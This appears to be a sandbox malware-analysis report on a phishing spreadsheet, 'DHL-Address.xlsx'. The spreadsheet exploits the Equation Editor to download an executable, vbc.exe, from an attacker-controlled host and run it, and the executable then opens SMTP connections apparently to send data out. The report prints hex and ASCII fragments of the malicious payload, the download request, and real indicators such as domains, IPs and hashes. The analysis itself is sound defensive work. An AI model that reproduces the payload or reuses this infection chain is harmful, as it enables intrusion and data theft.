                                                                                              Category:dropped
                                                                                              Size (bytes):330
                                                                                              Entropy (8bit):1.4377382811115937
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                              Malicious:true
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              C:\Users\Public\vbc.exe
                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):843776
                                                                                              Entropy (8bit):7.300736524263088
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8XT4rp65D+SL7y7INIIdGZMonTVA2Wsa8tpJKS:VhSJNILZn62WJ8td
                                                                                              MD5:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              SHA1:7C3D92552F6EBAB8956727BEECAAC5D22C87A55B
                                                                                              SHA-256:3311CEA59262B019A69FB72B72A36FC8E55D48A0F14F853B3A52FC8740542E99
                                                                                              SHA-512:4E3ABE570FA413FB74B1EFCF56560D5275CBCAF8217779E46DC65E13C2185C23F0BE2B01B91DCB5AEAD24C6F68E8F84B432B7EFBA87F2CC835BFA2848A406740
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.............>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<X...............................................................(....*&..(.....*.s ........s!........s"........s#........s$........*...0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*&..(*....*...0..<........~.....(+.....,!r...p.....(,...o-...s.............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o/....+..*...0..<........~.....(+.....,!rG..p.....(,

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Microsoft Excel 2007+
                                                                                              Entropy (8bit):7.995116916272445
                                                                                              TrID:
                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                              • ZIP compressed archive (8000/1) 16.67%
                                                                                              File name:DHL-Address.xlsx
                                                                                              File size:600867
                                                                                              MD5:5de2e8bdb620804fd22d76f1e9fedf6e
                                                                                              SHA1:942ce29cd8138a1594ee416debf753d8eaa71528
                                                                                              SHA256:f5c3bea5b81c221bc8737bd8489154745c8d6644d7d19484218151f9a1c1f656
                                                                                              SHA512:f24f1d93e61dffe4c48995e0a1ef039b7346cbd9f94a65dffac4d360b5f7419306bcffd57f403a7a6764dd38d7ec9b59e1d0462703f834edc368c38bda939e53
                                                                                              SSDEEP:12288:pT8QDq8fMa8L7PerWcF35XNjIko4RH2SMU6ZHAz1OJicXVh/2DV3:tTrUa8LaWkPBdWI1YiJ53
                                                                                              File Content Preview:PK..........!..cm.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                              File Icon

                                                                                              Icon Hash:e4e2aa8aa4b4bcb4

                                                                                              Static OLE Info

                                                                                              General

                                                                                              Document Type:OpenXML
                                                                                              Number of OLE Files:1

                                                                                              OLE File "/opt/package/joesandbox/database/analysis/339078/sample/DHL-Address.xlsx"

                                                                                              Indicators

                                                                                              Has Summary Info:False
                                                                                              Application Name:unknown
                                                                                              Encrypted Document:False
                                                                                              Contains Word Document Stream:
                                                                                              Contains Workbook/Book Stream:
                                                                                              Contains PowerPoint Document Stream:
                                                                                              Contains Visio Document Stream:
                                                                                              Contains ObjectPool Stream:
                                                                                              Flash Objects Count:
                                                                                              Contains VBA Macros:False

                                                                                              Summary

                                                                                              Author:
                                                                                              Last Saved By:
                                                                                              Create Time:2006-09-16T00:00:00Z
                                                                                              Last Saved Time:2021-01-13T08:51:14Z
                                                                                              Creating Application:Microsoft Excel
                                                                                              Security:0

                                                                                              Document Summary

                                                                                              Thumbnail Scaling Desired:false
                                                                                              Company:
                                                                                              Contains Dirty Links:false
                                                                                              Shared Document:false
                                                                                              Changed Hyperlinks:false
                                                                                              Application Version:12.0000

                                                                                              Streams

                                                                                              Stream Path: \x1Ole, File Type: data, Stream Size: 20
                                                                                              General
                                                                                              Stream Path:\x1Ole
                                                                                              File Type:data
                                                                                              Stream Size:20
                                                                                              Entropy:0.568995593589
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: \x1oLe10NatIve, File Type: data, Stream Size: 406296
                                                                                              General
                                                                                              Stream Path:\x1oLe10NatIve
                                                                                              File Type:data
                                                                                              Stream Size:406296
                                                                                              Entropy:7.99509276826
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . i 5 . ? R . . . [ . . & A . . . . . % . . . 2 . X . . . . . . U . V . . . . . y ) . . . . . . . . . E . X . . B . . . o . . o . ~ . . ' o . Z . . . . t . v } . . t . . . . k . . . . . . , . . . . T . . % I . . { p u . . . P . . . z . 0 < . . . c 1 . u . . . . . H . . . v . D . . l . . O Y . . . Z . . . . 2 _ . . . . n 5 . . . . F . f . . $ & o . . > . 2 . D . 3 . . . " . . t . . . a ! d . . ~ . 0 u ; . 3 . . . . . . 8 . . E $ . 4 . V . O . . U . . D . ^ . . . _ . V . . . . . 5 j . . . . 1 . .
                                                                                              Data Raw:e6 cd fd 03 02 69 35 d8 3f 52 01 08 9e 5b b8 8a 26 41 db 05 b2 96 04 25 8b 10 8b 32 bd 58 98 b9 ff f7 d5 8b 55 09 56 ff d2 05 b8 1b 79 29 05 d6 11 8d d6 ff e0 a3 1f 45 dd 58 07 c2 42 00 8c 98 6f ad d2 6f 15 7e c7 b0 27 6f bc 5a f6 20 17 01 f2 74 89 76 7d 20 b5 b4 74 9e b4 82 9d 6b b6 e6 d8 90 eb f8 2c d9 b8 d1 a4 54 03 dc 25 49 1c e5 7b 70 75 e4 83 11 50 84 05 b4 7a 83 30 3c ba ad

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 13, 2021 13:17:21.988862038 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.162621021 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.162832975 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.163568020 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.339915037 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.339965105 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.340003967 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.340055943 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.340075970 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.340146065 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.340153933 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.340158939 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514180899 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514231920 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514280081 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514326096 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514339924 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514375925 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514379025 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514383078 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514400005 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514419079 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514425039 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514458895 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514488935 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514496088 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514523983 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514544964 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691092968 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691152096 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691190958 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691214085 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691234112 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691241980 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691246986 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691274881 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691288948 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691313982 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691327095 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691351891 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691366911 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691430092 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691390991 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691485882 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691500902 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691528082 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691566944 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691567898 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691576004 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691616058 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691617966 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691659927 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691668034 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691699028 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691710949 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691736937 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691750050 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691776037 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691790104 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691833973 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.695110083 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865525961 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865576982 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865614891 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865653038 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865689039 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865726948 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865763903 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865811110 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865808964 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865850925 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865854025 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865856886 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865875006 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865892887 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865922928 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865930080 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865936041 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865969896 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865993023 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866007090 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866035938 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866044998 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866063118 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866082907 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866101027 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866130114 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866139889 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866190910 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866199017 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866245031 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866262913 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866283894 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866298914 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866322041 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866336107 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866358995 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866372108 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866395950 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866436958 CET4916580192.168.2.22192.210.214.178

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 13, 2021 13:17:21.147867918 CET5219753192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:17:21.508595943 CET53521978.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:17:21.509027958 CET5219753192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:17:21.856992006 CET53521978.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:17:21.857408047 CET5219753192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:17:21.913824081 CET53521978.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:17:21.914427996 CET5219753192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:17:21.970621109 CET53521978.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:00.284296989 CET5309953192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:00.342308998 CET53530998.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:02.322484016 CET5283853192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:02.370596886 CET53528388.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:02.371534109 CET5283853192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:02.419559956 CET53528388.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:02.458683968 CET6120053192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:02.515177011 CET53612008.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:02.515755892 CET6120053192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:02.563786030 CET53612008.8.8.8192.168.2.22

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Jan 13, 2021 13:17:21.147867918 CET192.168.2.228.8.8.80xfc39Standard query (0)globuserinessserverfiletransferprotocol.mangospot.netA (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.509027958 CET192.168.2.228.8.8.80xfc39Standard query (0)globuserinessserverfiletransferprotocol.mangospot.netA (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.857408047 CET192.168.2.228.8.8.80xfc39Standard query (0)globuserinessserverfiletransferprotocol.mangospot.netA (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.914427996 CET192.168.2.228.8.8.80xfc39Standard query (0)globuserinessserverfiletransferprotocol.mangospot.netA (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:19:00.284296989 CET192.168.2.228.8.8.80x5aacStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Jan 13, 2021 13:17:21.508595943 CET8.8.8.8192.168.2.220xfc39No error (0)globuserinessserverfiletransferprotocol.mangospot.net192.210.214.178A (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.856992006 CET8.8.8.8192.168.2.220xfc39No error (0)globuserinessserverfiletransferprotocol.mangospot.net192.210.214.178A (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.913824081 CET8.8.8.8192.168.2.220xfc39No error (0)globuserinessserverfiletransferprotocol.mangospot.net192.210.214.178A (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.970621109 CET8.8.8.8192.168.2.220xfc39No error (0)globuserinessserverfiletransferprotocol.mangospot.net192.210.214.178A (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:19:00.342308998 CET8.8.8.8192.168.2.220x5aacNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • globuserinessserverfiletransferprotocol.mangospot.net

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.2249165192.210.214.17880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 13, 2021 13:17:22.163568020 CET1OUTGET /csrss/vbc.exe HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: globuserinessserverfiletransferprotocol.mangospot.net
                                                                                              Connection: Keep-Alive
                                                                                              Jan 13, 2021 13:17:22.339915037 CET2INHTTP/1.1 200 OK
                                                                                              Date: Wed, 13 Jan 2021 12:17:21 GMT
                                                                                              Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                              Last-Modified: Wed, 13 Jan 2021 09:01:13 GMT
                                                                                              ETag: "ce000-5b8c461903ba5"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 843776
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdownload
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 b6 fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d6 0c 00 00 08 00 00 00 00 00 00 3e f4 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f3 0c 00 4f 00 00 00 00 00 0d 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d4 0c 00 00 20 00 00 00 d6 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 00 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f4 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 58 01 00 d8 a0 01 00 03 00 00 00 19 01 00 06 14 f9 02 00 d8 fa 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1e 00 00 0a 2a 26 00 02 28 1f 00 00 0a 00 2a ce 73 20 00 00 0a 80 01 00 00 04 73 21 00 00 0a 80 02 00 00 04 73 22 00 00 0a 80 03 00 00 04 73 23 00 00 0a 80 04 00 00 04 73 24 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 26 00 02 28 2a 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2b 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2c 00 00 0a 6f 2d 00 00 0a 73 2e 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 1a 00 00 00 08 00 00 11 00 28 0a 00 00 06 72 3d 00 00 70 7e 07 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 08 00 00 04 14 28 2b 00 00 0a 0b 07 2c 21 72 47 00 00 70 d0 06 00 00 02 28 2c 00 00 0a 6f 2d 00 00 0a 73
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_P> @ @@O H.textD `.rsrc@@.reloc @B H<X(*&(*s s!s"s#s$*0~o%+*0~o&+*0~o'+*0~o(+*0~o)+*&(**0<~(+,!rp(,o-s.~+*0~+*"*0(r=p~o/+*0<~(+,!rGp(,o-s


                                                                                              SMTP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                              Jan 13, 2021 13:19:00.728404999 CET58749166199.193.7.228192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                              Jan 13, 2021 13:19:00.728996992 CET49166587192.168.2.22199.193.7.228EHLO 414408
                                                                                              Jan 13, 2021 13:19:00.907455921 CET58749166199.193.7.228192.168.2.22250-mta-11.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250 STARTTLS
                                                                                              Jan 13, 2021 13:19:00.907985926 CET49166587192.168.2.22199.193.7.228STARTTLS
                                                                                              Jan 13, 2021 13:19:01.086139917 CET58749166199.193.7.228192.168.2.22220 Ready to start TLS
                                                                                              Jan 13, 2021 13:19:05.362668991 CET58749168199.193.7.228192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                              Jan 13, 2021 13:19:05.362907887 CET49168587192.168.2.22199.193.7.228EHLO 414408
                                                                                              Jan 13, 2021 13:19:05.549592972 CET58749168199.193.7.228192.168.2.22250-mta-11.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250 STARTTLS
                                                                                              Jan 13, 2021 13:19:05.550520897 CET49168587192.168.2.22199.193.7.228STARTTLS
                                                                                              Jan 13, 2021 13:19:05.736862898 CET58749168199.193.7.228192.168.2.22220 Ready to start TLS

                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Start time:13:16:43
                                                                                              Start date:13/01/2021
                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                              Imagebase:0x13fe00000
                                                                                              File size:27641504 bytes
                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:17:04
                                                                                              Start date:13/01/2021
                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                              Imagebase:0x400000
                                                                                              File size:543304 bytes
                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:17:08
                                                                                              Start date:13/01/2021
                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\Public\vbc.exe'
                                                                                              Imagebase:0x1030000
                                                                                              File size:843776 bytes
                                                                                              MD5 hash:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
